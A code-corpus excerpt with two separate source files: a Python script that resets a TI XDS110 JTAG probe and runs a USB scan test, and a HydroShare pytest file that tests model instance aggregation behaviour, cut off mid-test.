<filename>source/lib/probe.py # # Copyright (c) 2019, <NAME> # This file is licensed under the terms of the MIT license. # # # xds110 support # import sys import time import array from lib.ports import * from lib.utility import * from lib.shell import * # ------------------------------------------ XDS_USB = (0x0451, 0xbef3) # ------------------------------------------ def xds_reset(dev, delay=100): #_ = {0:'CDC Communication', # 1:'CDC Data', 2:'Vendor Specific', 3:'CDC Communication', # 4:'CDC Data', 5:'Human Interface Device', 6:'Vendor Specific'} ep = usb_point(dev, 2, 2) if ep is None: return False for v in ('00', '01') * 2: ep.write(hex2dec('{} {} {} {}'.format('2a', '02', '00', '0e {}'.format(v)))) time.sleep(delay / 1000) return True # ------------------------------------------ __scan_test__ = ( '2a 01 00 01', '2a 01 00 03', '2a 05 00 04 00 00 00 00', '2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00', '2a 02 00 05 01', '2a 05 00 07 a0 86 01 00', '2a 05 00 2b 01 00 00 00', '2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00', '2a 02 00 05 01', '2a 05 00 07 a0 86 01 00', '2a 09 00 09 01 00 00 00 01 00 00 00', '2a 01 00 1a', '2a 01 00 2f', '2a 01 00 02', '2a 01 00 01', '2a 01 00 03', '2a 05 00 04 00 00 00 00', '2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00', '2a 02 00 05 01', '2a 05 00 07 a0 86 01 00', '2a 05 00 2b 01 00 00 00', '2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 10 00 0a 00 08 03 01 05 01 00 00 00 00 00 00 01 00 01', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)), '2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa', '2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)), '2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01', '2a 01 00 08', '2a 09 00 09 05 00 00 00 02 00 00 00', '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)), '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)), '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)), '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)), '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)), '2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa', '2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)), '2a 01 00 1a', '2a 01 00 2f', '2a 01 00 02' ) # ------------------------------------------ def xds_test(dev, reset=True): if reset: xds_reset(dev) ep2o = usb_point(dev, 2, 2) ep2i = usb_point(dev, 2, 3) _ = dev.read(ep2i.bEndpointAddress, 1024) def send(epo, msg, epi=None): _ = epo.write(hex2dec(msg)) if epi is not None: buf = dev.read(epi.bEndpointAddress, 1024) return buf return None def collect(v): res = send(ep2o, v, ep2i) if res is not None: if len(res) > 21: res = set(res[8:]) if len(res) % 3 != 1: # super-lazy check return False return True for entry in __scan_test__: if not collect(entry): raise Exception('integrity scan-test on the JTAG DR/IR has failed')
pytest/functional/hs_file_types/test_model_instance_aggregation.py
hydroshare/hydroshare
178
12729245
import os import pytest from django.core.exceptions import ValidationError from django.core.files.uploadedfile import UploadedFile from hs_core.hydroshare import add_file_to_resource, ResourceFile, add_resource_files from hs_core.views.utils import move_or_rename_file_or_folder from hs_file_types.forms import ModelInstanceMetadataValidationForm from hs_file_types.models import ( ModelInstanceLogicalFile, ModelProgramLogicalFile, NetCDFLogicalFile, GeoRasterLogicalFile, GeoFeatureLogicalFile, GenericLogicalFile, TimeSeriesLogicalFile, RefTimeseriesLogicalFile, FileSetLogicalFile ) @pytest.mark.django_db(transaction=True) def test_link_model_aggregations_same_resource(composite_resource_with_mi_aggregation, mock_irods): """Test that we can link one model instance aggregation to one model program aggregation within the same resource""" res, user = composite_resource_with_mi_aggregation assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is not related to any model program aggregation assert mi_aggr.metadata.executed_by is None # create a model program aggregation file_path = 'pytest/assets/logan.vrt' upload_folder = '' file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) res_file = add_file_to_resource( res, file_to_upload, folder=upload_folder, check_target_folder=True ) assert ModelProgramLogicalFile.objects.count() == 0 # set file to model program aggregation type ModelProgramLogicalFile.set_file_type(res, user, res_file.id) assert ModelProgramLogicalFile.objects.count() == 1 mp_aggr = ModelProgramLogicalFile.objects.first() # link model instance aggregation to model program aggregation mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res) assert mi_validation_form.is_valid() mi_validation_form.update_metadata(metadata=mi_aggr.metadata) mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is related to model program aggregation assert mi_aggr.metadata.executed_by is not None assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_model_instance_on_model_program_delete(composite_resource_with_mi_aggregation, mock_irods): """Test that when we remove/delete a model program aggregation that the linked model instance aggregation does not get deleted and the metadata of the model instance aggregation is set to dirty""" res, user = composite_resource_with_mi_aggregation assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is not related to any model program aggregation assert mi_aggr.metadata.executed_by is None # create a model program aggregation file_path = 'pytest/assets/logan.vrt' upload_folder = '' file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) res_file = add_file_to_resource( res, file_to_upload, folder=upload_folder, check_target_folder=True ) assert ModelProgramLogicalFile.objects.count() == 0 # set file to model program aggregation type ModelProgramLogicalFile.set_file_type(res, user, res_file.id) assert ModelProgramLogicalFile.objects.count() == 1 mp_aggr = ModelProgramLogicalFile.objects.first() # link model instance aggregation to model program aggregation mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res) assert mi_validation_form.is_valid() mi_validation_form.update_metadata(metadata=mi_aggr.metadata) mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is related to model program aggregation assert mi_aggr.metadata.executed_by is not None assert mi_aggr.metadata.is_dirty is True # remove/delete mp_aggregation mp_aggr.remove_aggregation() assert ModelProgramLogicalFile.objects.count() == 0 assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is not related to any model program aggregation assert mi_aggr.metadata.executed_by is None # check that mi_aggr metadata is set to dirty assert mi_aggr.metadata.is_dirty is True assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_model_instance_on_model_program_rename_1(composite_resource_with_mi_aggregation, mock_irods): """Test that when we rename a file that represents a model program aggregation then the linked model instance aggregation metadata is set to dirty""" res, user = composite_resource_with_mi_aggregation assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is not related to any model program aggregation assert mi_aggr.metadata.executed_by is None # create a model program aggregation file_path = 'pytest/assets/logan.vrt' upload_folder = '' file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) res_file = add_file_to_resource( res, file_to_upload, folder=upload_folder, check_target_folder=True ) assert ModelProgramLogicalFile.objects.count() == 0 # set file to model program aggregation type ModelProgramLogicalFile.set_file_type(res, user, res_file.id) assert ModelProgramLogicalFile.objects.count() == 1 mp_aggr = ModelProgramLogicalFile.objects.first() # link model instance aggregation to model program aggregation mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res) assert mi_validation_form.is_valid() mi_validation_form.update_metadata(metadata=mi_aggr.metadata) mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is related to model program aggregation assert mi_aggr.metadata.executed_by is not None assert mi_aggr.metadata.is_dirty is True # rename the model program file name src_path = 'data/contents/{}'.format(res_file.file_name) tgt_path = 'data/contents/{}'.format("logan_1.vrt") move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path) assert ModelProgramLogicalFile.objects.count() == 1 assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr metadata is set to dirty assert mi_aggr.metadata.is_dirty is True assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_model_instance_on_model_program_rename_2(composite_resource_with_mi_aggregation, mock_irods): """Test that when we rename a folder that represents a model program aggregation then the linked model instance aggregation metadata is set to dirty""" res, user = composite_resource_with_mi_aggregation assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is not related to any model program aggregation assert mi_aggr.metadata.executed_by is None # create a model program aggregation file_path = 'pytest/assets/logan.vrt' mp_folder = "mp_folder" ResourceFile.create_folder(res, mp_folder) file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) add_file_to_resource( res, file_to_upload, folder=mp_folder, check_target_folder=True ) assert ModelProgramLogicalFile.objects.count() == 0 # set file to model program aggregation type ModelProgramLogicalFile.set_file_type(res, user, folder_path=mp_folder) assert ModelProgramLogicalFile.objects.count() == 1 mp_aggr = ModelProgramLogicalFile.objects.first() # link model instance aggregation to model program aggregation mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res) assert mi_validation_form.is_valid() mi_validation_form.update_metadata(metadata=mi_aggr.metadata) mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr is related to model program aggregation assert mi_aggr.metadata.executed_by is not None assert mi_aggr.metadata.is_dirty is True # rename the model program file name src_path = 'data/contents/{}'.format(mp_folder) tgt_path = 'data/contents/{}'.format("{}_1".format(mp_folder)) move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path) assert ModelProgramLogicalFile.objects.count() == 1 assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # check that mi_aggr metadata is set to dirty assert mi_aggr.metadata.is_dirty is True assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_set_metadata(composite_resource_with_mi_aggregation, mock_irods): """Test that we can store all metadata items for a model instance aggregation""" res, _ = composite_resource_with_mi_aggregation mi_aggr = ModelInstanceLogicalFile.objects.first() # test extra metadata assert not mi_aggr.metadata.extra_metadata extra_meta = {'key1': 'value 1', 'key2': 'value 2'} mi_aggr.metadata.extra_metadata = extra_meta mi_aggr.metadata.save() assert mi_aggr.metadata.extra_metadata == extra_meta # test keywords assert not mi_aggr.metadata.keywords keywords = ['kw-1', 'kw-2'] mi_aggr.metadata.keywords = keywords mi_aggr.metadata.save() assert mi_aggr.metadata.keywords == keywords # test coverage metadata assert not mi_aggr.metadata.coverages.all() value_dict = {'name': 'Name for period coverage', 'start': '1/1/2000', 'end': '12/12/2012'} temp_cov = mi_aggr.metadata.create_element('coverage', type='period', value=value_dict) assert temp_cov.value['name'] == 'Name for period coverage' assert temp_cov.value['start'] == '1/1/2000' assert temp_cov.value['end'] == '12/12/2012' assert mi_aggr.metadata.coverages.all().count() == 1 value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'} spatial_cov = mi_aggr.metadata.create_element('coverage', type='point', value=value_dict) assert spatial_cov.value['projection'] == 'WGS 84 EPSG:4326' assert spatial_cov.value['units'] == 'Decimal degree' assert spatial_cov.value['north'] == 12.6789 assert spatial_cov.value['east'] == 56.45678 assert mi_aggr.metadata.coverages.all().count() == 2 # test model output metadata assert not mi_aggr.metadata.has_model_output mi_aggr.metadata.has_model_output = True mi_aggr.metadata.save() # test setting metadata json assert not mi_aggr.metadata.metadata_json # set mi metadata json from the content of the following file schema_file_path = 'pytest/assets/mi_metadata.json' with open(schema_file_path, 'r') as file_obj: meta_json = file_obj.read() assert len(meta_json) > 0 mi_aggr.metadata.metadata_json = meta_json mi_aggr.metadata.save() mi_aggr = ModelInstanceLogicalFile.objects.first() assert mi_aggr.metadata.metadata_json assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_netcdf_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that when a netcdf file is uploaded to a folder that represents a model instance aggregation, a netcdf aggregation is created automatically""" resource, _ = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert NetCDFLogicalFile.objects.count() == 0 # upload a netcdf file to the mi_aggr_path - folder that represents the model instance aggregation nc_file_name = "netcdf_valid.nc" netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name) _add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr_path) # there should be three resource file - one generated by netcdf aggregation assert resource.files.all().count() == 3 assert NetCDFLogicalFile.objects.count() == 1 # the netcdf file added to the model instance folder should be part of a new netcdf aggregation nc_res_file = ResourceFile.get(resource=resource, file=nc_file_name, folder=mi_aggr_path) assert nc_res_file.has_logical_file # the netcdf aggregation should contain 2 files - nc and the txt files assert NetCDFLogicalFile.objects.first().files.count() == 2 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_raster_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that when a raster file (.tif) is uploaded to a folder that represents a model instance aggregation, a raster aggregation is created automatically""" resource, _ = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert GeoRasterLogicalFile.objects.count() == 0 # upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation raster_file_name = 'small_logan.tif' raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name) _add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr_path) # there should be three resource files ( one extra vrt file added as part of raster aggregation creation) assert resource.files.all().count() == 3 # there should be one raster aggregation now assert GeoRasterLogicalFile.objects.count() == 1 # the tif file added to the model instance folder should be part of a new raster aggregation raster_res_file = ResourceFile.get(resource=resource, file=raster_file_name, folder=mi_aggr_path) assert raster_res_file.has_logical_file # the raster aggregation should contain 2 files (tif and vrt) assert GeoRasterLogicalFile.objects.first().files.count() == 2 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_geofeature_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that when files that represents a geofeature are uploaded to a folder that represents a model instance, a geofeature aggregation is created automatically""" resource, _ = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert GeoFeatureLogicalFile.objects.count() == 0 # upload all 4 geo feature files the mi_aggr_ptah - folder that represents the model instance aggregation base_data_file_path = 'hs_file_types/tests/data/{}' shp_file_name = "states.shp" shp_file_path = base_data_file_path.format(shp_file_name) shx_file_name = "states.shx" shx_file_path = base_data_file_path.format(shx_file_name) dbf_file_name = "states.dbf" dbf_file_path = base_data_file_path.format(dbf_file_name) prj_file_name = "states.prj" prj_file_path = base_data_file_path.format(prj_file_name) geo_feature_files = [shp_file_path, shx_file_path, dbf_file_path, prj_file_path] _add_files_to_resource(resource=resource, files_to_add=geo_feature_files, upload_folder=mi_aggr_path) # there should be five resource files assert resource.files.all().count() == 5 # the shp file added to the model instance folder should be part of a new geo feature aggregation shp_res_file = ResourceFile.get(resource=resource, file=shp_file_name, folder=mi_aggr_path) assert shp_res_file.has_logical_file # the geo feature aggregation should contain 4 files that we uploaded assert GeoFeatureLogicalFile.objects.first().files.count() == 4 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that when a timeseries sqlite file is uploaded to a folder that represents a model instance, a timeseries aggregation is created automatically from that sqlite file""" resource, _ = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert TimeSeriesLogicalFile.objects.count() == 0 # upload a sqlite file to the mi_aggr_path - folder that represents the model instance aggregation sqlite_file_name = 'ODM2_Multi_Site_One_Variable.sqlite' sqlite_file_path = 'hs_file_types/tests/data/{}'.format(sqlite_file_name) _add_files_to_resource(resource=resource, files_to_add=[sqlite_file_path], upload_folder=mi_aggr_path) # there should be 2 resource files assert resource.files.all().count() == 2 # the sqlite file added to the model instance folder should be part of a new timeseries aggregation sqlite_res_file = ResourceFile.get(resource=resource, file=sqlite_file_name, folder=mi_aggr_path) assert sqlite_res_file.has_logical_file assert TimeSeriesLogicalFile.objects.count() == 1 assert ModelInstanceLogicalFile.objects.first().files.count() == 1 # the timeseries aggregation should contain 1 file assert TimeSeriesLogicalFile.objects.first().files.count() == 1 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_ref_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that when a ref timeseries json file is uploaded to a folder that represents a model instance aggregation, a ref timeseries aggregation is created automatically from that json file""" resource, _ = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.first().files.count() == 1 mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert RefTimeseriesLogicalFile.objects.count() == 0 # upload a ref timeseries json file to the mi_aggr_path - folder that represents the model instance aggregation ref_timeseries_file_name = 'multi_sites_formatted_version1.0.refts.json' ref_timeseries_file_path = 'hs_file_types/tests/{}'.format(ref_timeseries_file_name) _add_files_to_resource(resource=resource, files_to_add=[ref_timeseries_file_path], upload_folder=mi_aggr_path) # there should be 2 resource files assert resource.files.all().count() == 2 # the json file added to the model instance folder should be part of a new ref timeseries aggregation ref_ts_res_file = ResourceFile.get(resource=resource, file=ref_timeseries_file_name, folder=mi_aggr_path) assert ref_ts_res_file.has_logical_file assert RefTimeseriesLogicalFile.objects.count() == 1 assert ModelInstanceLogicalFile.objects.first().files.count() == 1 # ref timeseries aggregation should contain 1 file assert RefTimeseriesLogicalFile.objects.first().files.count() == 1 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_canot_create_fileset_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that one can't create a fileset aggregation inside a folder that represents a model instance aggregation""" resource, user = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name file_path = 'pytest/assets/logan.vrt' fs_folder = 'fileset_folder' fs_folder_path = os.path.join(mi_aggr_path, fs_folder) ResourceFile.create_folder(resource, fs_folder) _add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=fs_folder_path) # trying to set folder to fileset logical file type (aggregation) should fail assert FileSetLogicalFile.objects.count() == 0 with pytest.raises(ValidationError): FileSetLogicalFile.set_file_type(resource, user, folder_path=fs_folder_path) assert FileSetLogicalFile.objects.count() == 0 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_canot_create_mi_aggregation_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods): """Test that one can't create a model instance aggregation inside a folder that represents a model instance aggregation""" resource, user = composite_resource_with_mi_aggregation_folder mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name assert ModelInstanceLogicalFile.objects.count() == 1 file_path = 'pytest/assets/logan.vrt' mi_sub_folder = 'mi_sub_folder' mi_sub_folder_path = os.path.join(mi_aggr_path, mi_sub_folder) ResourceFile.create_folder(resource, mi_sub_folder) _add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=mi_sub_folder_path) # trying to set folder to model instance should fail assert ModelInstanceLogicalFile.objects.count() == 1 with pytest.raises(ValidationError): ModelInstanceLogicalFile.set_file_type(resource, user, folder_path=mi_sub_folder_path) assert ModelInstanceLogicalFile.objects.count() == 1 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_move_single_file_aggr_into_model_instance_aggregation(composite_resource, mock_irods): """ test that we can move a single file aggregation into a folder that represents a model instance aggregation""" res, user = composite_resource file_path = 'pytest/assets/generic_file.txt' mi_folder = 'mi_folder' ResourceFile.create_folder(res, mi_folder) file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) add_file_to_resource(res, file_to_upload, folder=mi_folder, check_target_folder=True) assert res.files.count() == 1 # at this point there should not be any model instance aggregation assert ModelInstanceLogicalFile.objects.count() == 0 # set folder to model instance aggregation type ModelInstanceLogicalFile.set_file_type(resource=res, user=user, folder_path=mi_folder) res_file = res.files.first() assert res_file.has_logical_file # file has folder assert res_file.file_folder == mi_folder assert ModelInstanceLogicalFile.objects.count() == 1 # create a single file aggregation single_file_name = 'logan.vrt' file_path = 'pytest/assets/{}'.format(single_file_name) file_to_upload = UploadedFile(file=open(file_path, 'rb'), name=os.path.basename(file_path)) res_file = add_file_to_resource(res, file_to_upload, check_target_folder=True) # set file to generic logical file type (aggregation) GenericLogicalFile.set_file_type(res, user, res_file.id) assert GenericLogicalFile.objects.count() == 1 # moving the logan.vrt file into mi_folder should be successful src_path = 'data/contents/{}'.format(single_file_name) tgt_path = 'data/contents/{}/{}'.format(mi_folder, single_file_name) move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path) assert not res.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods): """Here we are testing fileset level spatial coverage update using the spatial data from the contained (children) aggregations - two child aggregations""" resource, user = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should not have any spatial coverage assert mi_aggr.metadata.spatial_coverage is None # auto create a raster aggregation inside the model instance aggregation assert GeoRasterLogicalFile.objects.count() == 0 # upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation raster_file_name = 'small_logan.tif' raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name) _add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder) # there should be three resource files ( one extra vrt file added as part of raster aggregation creation) assert resource.files.all().count() == 3 # there should be one raster aggregation now assert GeoRasterLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should now have spatial coverage assert mi_aggr.metadata.spatial_coverage is not None assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691 assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195 assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891 assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055 # auto create a netcdf aggregation inside the model instance aggregation assert NetCDFLogicalFile.objects.count() == 0 # upload a netcdf file to the folder that represents the model instance aggregation nc_file_name = "netcdf_valid.nc" netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name) _add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder) assert NetCDFLogicalFile.objects.count() == 1 nc_aggr = NetCDFLogicalFile.objects.first() # netcdf aggr should have spatial coverage assert nc_aggr.metadata.spatial_coverage is not None # update model instance aggregation spatial coverage from the contained 2 aggregations mi_aggr.update_spatial_coverage() # test model instance aggregation spatial coverage data assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691 assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.50594036845686 assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.8639080745171 assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055 assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_no_auto_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods): """Here we are testing model instance level spatial coverage auto update does not happen when a contained aggregation spatial coverage gets created as part of that aggregation creation since the model instance aggregation has spatial coverage prior to the child aggregation creation """ resource, user = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should not have any spatial coverage assert mi_aggr.metadata.spatial_coverage is None # create spatial coverage for model instance value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'} mi_aggr.metadata.create_element('coverage', type='point', value=value_dict) # model aggr should now have any spatial coverage assert mi_aggr.metadata.spatial_coverage is not None # auto create a raster aggregation inside the model instance aggregation assert GeoRasterLogicalFile.objects.count() == 0 # upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation raster_file_name = 'small_logan.tif' raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name) _add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder) # there should be three resource files ( one extra vrt file added as part of raster aggregation creation) assert resource.files.all().count() == 3 # there should be one raster aggregation now assert GeoRasterLogicalFile.objects.count() == 1 gr_aggr = GeoRasterLogicalFile.objects.first() # raster aggr should have spatial coverage assert gr_aggr.metadata.spatial_coverage is not None assert gr_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691 assert gr_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195 assert gr_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891 assert gr_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055 # check model instance spatial coverage has not been updated assert mi_aggr.metadata.spatial_coverage.value['east'] == value_dict['east'] assert mi_aggr.metadata.spatial_coverage.value['north'] == value_dict['north'] assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods): """Here we are testing model instance level temporal coverage auto update when a contained aggregation temporal coverage gets created as part of that aggregation creation provided the model instance aggregation has no temporal coverage prior to the child aggregation creation """ resource, user = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should not have any temporal coverage assert mi_aggr.metadata.temporal_coverage is None # auto create a netcdf aggregation inside the model instance aggregation assert NetCDFLogicalFile.objects.count() == 0 # upload a netcdf file to the folder that represents the model instance aggregation nc_file_name = "netcdf_valid.nc" netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name) _add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder) assert 